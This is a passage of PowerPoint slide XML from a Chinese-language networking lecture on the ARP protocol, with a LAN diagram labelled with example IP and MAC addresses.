              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>号</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>网络接口地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>投递</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238594" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>协议</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="组合 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2062286" y="3531625"/>
            <a:ext cx="5451475" cy="3311525"/>
            <a:chOff x="1619672" y="3429843"/>
            <a:chExt cx="5451475" cy="3311525"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="6" name="Object 7"/>
            <p:cNvGraphicFramePr/>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="3973935" y="3542555"/>
            <a:ext cx="428625" cy="400050"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s648338" name="Clip" r:id="rId1" imgW="428625" imgH="400050" progId="MS_ClipArt_Gallery.2">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId1" imgW="428625" imgH="400050" progId="MS_ClipArt_Gallery.2">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="0" name="图片 64833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935" y="354255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Freeform 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3438947" y="4452193"/>
              <a:ext cx="1357313" cy="1500187"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T1" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T2" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T3" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T4" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T5" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T6" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T7" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T8" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T9" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T10" fmla="*/ 0 w 855"/>
                <a:gd name="T11" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T12" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T13" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T14" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T15" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T16" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T17" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T18" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T19" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T20" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T21" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T22" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T23" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T24" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T25" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T26" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T27" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T28" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T29" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T30" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T31" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T32" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T33" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T34" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T35" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T36" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T37" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T38" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T39" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T40" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T41" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T42" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T43" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T44" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T45" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T46" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T47" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T48" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T49" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T50" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T51" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T52" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T53" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T54" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T55" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T56" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T57" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T58" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T59" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T60" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T61" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T62" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T63" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T64" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T65" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T66" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T67" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T68" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T69" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T70" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T71" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T72" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T73" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T74" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T75" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T76" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T77" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T78" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T79" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T80" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T81" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T82" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T83" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T84" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T85" fmla="*/ 0 h 9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55"/>
                <a:gd name="T130" fmla="*/ 0 h 945"/>
                <a:gd name="T131" fmla="*/ 855 w 855"/>
                <a:gd name="T132" fmla="*/ 945 h 9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55" h="945">
                  <a:moveTo>
                    <a:pt x="151" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="123" y="3"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98" y="11"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60" y="35"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45" y="51"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32" y="69"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="91"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5" y="142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6" y="361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8" y="395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8" y="461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8" y="527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9" y="558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16" y="610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24" y="629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46" y="647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59" y="648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73" y="647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90" y="646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109" y="646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131" y="651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155" y="661"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182" y="679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214" y="701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248" y="728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285" y="757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322" y="786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="359" y="814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394" y="838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428" y="859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492" y="893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523" y="909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="555" y="923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="585" y="934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613" y="941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="640" y="944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665" y="941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687" y="934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708" y="924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="728" y="909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="745" y="891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="762" y="869"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="777" y="843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="791" y="812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="803" y="776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="809" y="756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="814" y="732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="819" y="706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="824" y="679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="832" y="619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="839" y="556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="844" y="493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="848" y="433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="850" y="405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="851" y="379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="851" y="356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="852" y="335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="852" y="299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853" y="269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="854" y="244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="852" y="222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="847" y="204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="839" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826" y="171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="807" y="156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="781" y="141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="749" y="130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711" y="121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671" y="113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="583" y="99"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="539" y="91"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="497" y="82"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455" y="71"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="409" y="57"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="314" y="29"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267" y="16"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224" y="6"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="00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aphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="8" name="Object 9"/>
            <p:cNvGraphicFramePr/>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="5472535" y="4895105"/>
            <a:ext cx="428625" cy="400050"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s648339" name="Clip" r:id="rId3" imgW="428625" imgH="400050" progId="MS_ClipArt_Gallery.2">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId3" imgW="428625" imgH="400050" progId="MS_ClipArt_Gallery.2">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="0" name="图片 6483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535" y="489510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0"/>
            <p:cNvGraphicFramePr/>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="3964410" y="6341318"/>
            <a:ext cx="428625" cy="400050"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s648340" name="Clip" r:id="rId5" imgW="428625" imgH="400050" progId="MS_ClipArt_Gallery.2">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId5" imgW="428625" imgH="400050" progId="MS_ClipArt_Gallery.2">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="0" name="图片 6483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4410" y="6341318"/>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1"/>
            <p:cNvGraphicFramePr/>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="2288010" y="4777630"/>
            <a:ext cx="428625" cy="400050"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s648341" name="Clip" r:id="rId7" imgW="428625" imgH="400050" progId="MS_ClipArt_Gallery.2">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId7" imgW="428625" imgH="400050" progId="MS_ClipArt_Gallery.2">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="0" name="图片 6483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8010" y="4777630"/>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2"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5339185" y="5007818"/>
              <a:ext cx="180975" cy="149225"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="127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2" name="Rectangle 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2662660" y="4871293"/>
              <a:ext cx="179387" cy="149225"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="127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3" name="Rectangle 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4161260" y="3912443"/>
              <a:ext cx="127000" cy="185737"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="127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4" name="Rectangle 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4115222" y="6153993"/>
              <a:ext cx="127000" cy="187325"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="12700">
              <a:solidFill>
                <a:schemeClr val="tx1"/>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5" name="Line 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2838872" y="4947493"/>
              <a:ext cx="61436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4207297" y="4104530"/>
              <a:ext cx="0" cy="4889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4796260" y="5072905"/>
              <a:ext cx="542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flipV="1">
              <a:off x="4181897" y="5820618"/>
              <a:ext cx="0"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0"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4426372" y="3887043"/>
              <a:ext cx="209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1A-2F-BB-76-09-AD</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Line 21"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="4293022" y="3988643"/>
              <a:ext cx="176213" cy="9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flipV="1">
              <a:off x="5418560" y="5147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2" name="Rectangle 23"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5004222" y="5441205"/>
              <a:ext cx="2066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58-23-D7-FA-20-B0</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Line 24"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="4251747" y="6233368"/>
              <a:ext cx="24606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25"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4540672" y="6149230"/>
              <a:ext cx="202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0C-C4-11-6F-E3-98</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Line 26"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="2749972" y="5020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7"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1619672" y="5331668"/>
              <a:ext cx="2024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71-65-F7-2B-08-53</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Rectangle 28"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3632622" y="4933205"/>
              <a:ext cx="957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b="1">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>   LAN</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Rectangle 29"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1849860" y="42886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237.196.7.23</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Line 30"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2495972" y="4541093"/>
              <a:ext cx="0" cy="2460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31"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4564485" y="34885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237.196.7.78</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Line 32"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="4324772" y="3613993"/>
              <a:ext cx="282575" cy="127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5674147" y="4653805"/>
              <a:ext cx="0" cy="24606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Rectangle 34"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5064547" y="4388693"/>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237.196.7.14</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Line 35"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3756447" y="6500068"/>
              <a:ext cx="2317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Rectangle 36"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2518197" y="635878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400" b="1">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>237.196.7.88</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Rectangle 5"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3653260" y="342984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A</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="Rectangle 7"/>
            <p:cNvSpPr>
